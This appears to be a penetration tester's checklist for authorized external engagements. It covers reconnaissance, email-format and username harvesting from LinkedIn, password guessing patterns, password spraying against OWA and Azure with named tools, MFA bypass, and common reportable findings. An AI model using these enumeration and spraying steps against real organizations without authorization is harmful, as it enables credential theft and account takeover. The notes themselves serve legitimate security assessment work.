External Pentesting
Last updated
Last updated
This doc should be signed and have a copy of it ; }
Scan the IPs to verify that we are not attacking another company
Subdomains (amass, assetfinder, DNSRecon, Subfinder )
Use Google Dorking:
site: domain.com -www
site: domain.com
site: *.domain.com
First thing todo before start with the big part.
openVAS
Nessus -
Do some research about naming convention for email (Ex: firstname.lastname)
Scrape Company LinkedIn with tools to put together the 2 conventions.
Check login form or password reset forms for user enumeration.
Password Strategy: currentSeason + currentYear + SpecialChar + location + address + companyname
Password Spray
msf: scanner owa_login
Check the OWA Version
Burpsuite Intruder
FFuF
Wfuzz
ike-scan
Office for instance we can look for other accounts.
if portal.azure.com find other accounts.
Password spray with previous password found.
Bypass MFA
No MFA
Recommend Guidelines, NIST, OWASP
Unpatched software or services that needs an update.
SecLists
Cirt
Weak ciphers
Test the SSL Certificate
Verbose error messages
Verbose stack trace
mDNS
Server Version, languages, response headers etc.
Some Broken Authentication finding like "Invalid Username"
Apache default pages
IIS default page
ike-scan
RDP
Telnet
Geo blocking not in place
Limits attack surface
Depends on the customer location of the client
Brute-Force Attacks
Nmap
Nessus
Web Enum
Have I been Pwned
Phonebook.cz -
LinkedIn2Username -
LinkedInt -
CredMaster -
TrevorSpray -